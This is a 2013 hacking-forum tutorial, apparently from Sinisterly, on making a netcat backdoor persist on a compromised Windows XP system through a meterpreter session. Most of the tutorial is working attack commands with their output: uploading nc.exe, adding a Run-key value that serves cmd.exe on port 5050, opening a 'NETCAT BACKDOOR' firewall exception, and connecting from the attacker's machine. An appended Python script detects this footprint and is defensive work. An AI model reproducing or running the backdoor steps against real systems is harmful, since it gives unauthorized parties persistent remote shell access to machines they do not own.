Sinisterly
Persistent Netcat Backdoor With Metasploit - LEGITimacy™ - 01-21-2013


Hello Hack Community. Today we will install a netcat backdoor on a compromised Windows system and make it persistent by adding a Run-key entry in the registry and opening a hole in the Windows firewall. :yeye:

First, let's upload netcat to the compromised system through our meterpreter session. We write it into C:\windows\system32, which (like the HKLM Run key used below) requires that the session already has administrative rights.

PHP Code:
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading  : /pentest/windows-binaries/tools/nc.exe -> C:\windows\system32
[*] uploaded   : /pentest/windows-binaries/tools/nc.exe -> C:\windows\system32\nc.exe


Next we want netcat to listen on a port of our choosing (5050 here), start automatically, and be reachable through the system firewall. Start by using the "reg enumkey" command to look at what is already in the 'HKLM\software\microsoft\windows\currentversion\run' key; every value in that key is executed when a user logs on, which is exactly where we will add our listener.


PHP Code:
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (3):

    VMware Tools
    VMware User Process
    quicktftpserver

Next we use the "reg setval" command to add a value that runs netcat at logon, and "reg queryval" to confirm it. The flags matter: -L tells the Windows nc.exe to keep re-listening after a client disconnects (a plain -l would exit after the first session, which is not persistent), -d detaches it from the console so no window pops up, -p 5050 is the listening port, and -e cmd.exe hands a command shell to whoever connects.

PHP Code:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 5050 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 5050 -e cmd.exe

Next, we need to let inbound connections through the Windows firewall to our netcat listener. We do this from an interactive command prompt with the "netsh" command; first we check whether the firewall is actually on ("Operational mode: Enable") in the active profile, because if it is off there is nothing to open. Note that the "netsh firewall" context used here belongs to XP and Server 2003; on Vista and later the same job is done with "netsh advfirewall firewall".

PHP Code:
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\ > netsh firewall show opmode
netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable

As shown above, the firewall is enabled in the current (Standard) profile, so it would block our listener. :yeye: Next, let's add a port exception for TCP 5050, confirm it shows up, and then use netcat from our attacking box to connect to it. :3

PHP Code:
C:\ > netsh firewall add portopening TCP 5050 "NETCAT BACKDOOR" ENABLE ALL
netsh firewall add portopening TCP 5050 "NETCAT BACKDOOR" ENABLE ALL
Ok.

C:\ > netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
5050   TCP       Enable   NETCAT BACKDOOR
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

CONNECTING TO THE BACKDOOR:

PHP Code:
root@bt:~# nc -v 192.168.56.60 5050 

And there you have it: a persistent netcat backdoor. :3 Two things to keep in mind: the Run key only fires when a user logs on, so the listener runs with that user's rights and is not there until somebody logs in; and nc.exe does no authentication or encryption, so anyone who can reach TCP 5050 gets the same cmd.exe you do, and both artifacts (the Run value and the named firewall exception) are trivial for a defender to spot. Thanks for viewing my TUT!
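The flip side of this tutorial is how a defender finds it. The two artifacts it leaves behind are a Run-key value pointing at a netcat-style listener and a matching firewall port exception. The script below is an added example (not code from the original post, and not a Metasploit or Windows tool): it parses the text of "netsh firewall show portopening" as shown above, scans a set of Run-key values for netcat binaries or "-e cmd.exe"-style listeners, pulls the listening port out of the command line (including stacked flags like "-Ldp 5050"), and correlates the two. The sample Run values and netsh output are constructed to match this tutorial; the extra "svchost32.exe" entry is an assumed renamed copy of nc.exe, included to show that the "-e cmd.exe" heuristic still catches it.

```python
import re
from typing import Dict, List, NamedTuple, Optional


class PortOpening(NamedTuple):
    profile: str
    port: int
    protocol: str
    mode: str
    name: str


# Binaries whose presence in a Run value is enough to flag on its own.
NETCAT_BINARIES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}

# "-e cmd.exe" / "-e powershell.exe": a listener that hands a shell to whoever connects.
EXEC_SHELL_RE = re.compile(r"(?:^|\s)-e\s+\S*(?:cmd|powershell)(?:\.exe)?\b", re.I)

# Port argument: "-p 5050" or stacked single-letter flags such as "-Ldp 5050".
PORT_RE = re.compile(r"(?:^|\s)-[A-Za-z]*p\s+(\d{1,5})\b")

# First token of a command line, quoted or not.
EXE_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')

PROFILE_RE = re.compile(r"^Port configuration for (\S+) profile:", re.I)
ROW_RE = re.compile(r"^(\d{1,5})\s+(TCP|UDP)\s+(\S+)\s+(.*?)\s*$", re.I)

# Constructed sample: same shape as "netsh firewall show portopening" in the tutorial.
SAMPLE_PORTOPENING = """\
Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
5050   TCP       Enable   NETCAT BACKDOOR
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
"""

# Constructed sample of HKLM\...\Run values (value name -> command), as reg queryval returns them.
# "svchost32" is an assumed renamed nc.exe, not something the tutorial installs.
SAMPLE_RUN_VALUES: Dict[str, str] = {
    "VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"',
    "nc": r"C:\windows\system32\nc.exe -Ldp 5050 -e cmd.exe",
    "svchost32": r"C:\windows\system32\svchost32.exe -L -p 4444 -e cmd.exe",
}


def parse_portopening(text: str) -> List[PortOpening]:
    """Parse `netsh firewall show portopening` output into one row per (profile, port)."""
    openings: List[PortOpening] = []
    profile: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PROFILE_RE.match(line)
        if m:
            profile = m.group(1)
            continue
        m = ROW_RE.match(line)
        if m and profile is not None:
            port, proto, mode, name = m.groups()
            openings.append(PortOpening(profile, int(port), proto.upper(), mode, name))
    return openings


def executable_basename(command: str) -> str:
    """Lower-cased file name of the program a Run value launches."""
    m = EXE_RE.match(command)
    if not m:
        return ""
    exe = m.group(1) or m.group(2)
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def listener_port(command: str) -> Optional[int]:
    m = PORT_RE.search(command)
    return int(m.group(1)) if m else None


def is_suspicious_run_value(command: str) -> bool:
    # Known netcat binary, or any program told to serve a shell to its client.
    return executable_basename(command) in NETCAT_BINARIES or bool(EXEC_SHELL_RE.search(command))


def find_backdoor_persistence(run_values: Dict[str, str], portopening_text: str) -> List[dict]:
    """Flag suspicious Run values and list the firewall profiles that expose their port."""
    openings = parse_portopening(portopening_text)
    findings: List[dict] = []
    for value_name, command in run_values.items():
        if not is_suspicious_run_value(command):
            continue
        port = listener_port(command)
        profiles = sorted({o.profile for o in openings
                           if port is not None and o.port == port and o.mode.lower() == "enable"})
        findings.append({"value_name": value_name, "command": command,
                         "port": port, "firewall_exceptions": profiles})
    return findings


if __name__ == "__main__":
    for f in find_backdoor_persistence(SAMPLE_RUN_VALUES, SAMPLE_PORTOPENING):
        exposed = ", ".join(f["firewall_exceptions"]) or "none"
        print(f"Run value '{f['value_name']}': port {f['port']}, firewall exception in: {exposed}")
```

On a live XP/2003 host the two inputs come from `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and `netsh firewall show portopening`; an entry that is both a shell listener and has an enabled exception in the current profile is the exact footprint this tutorial creates, while a listener with no exception (the 4444 case) is still worth pulling the binary for.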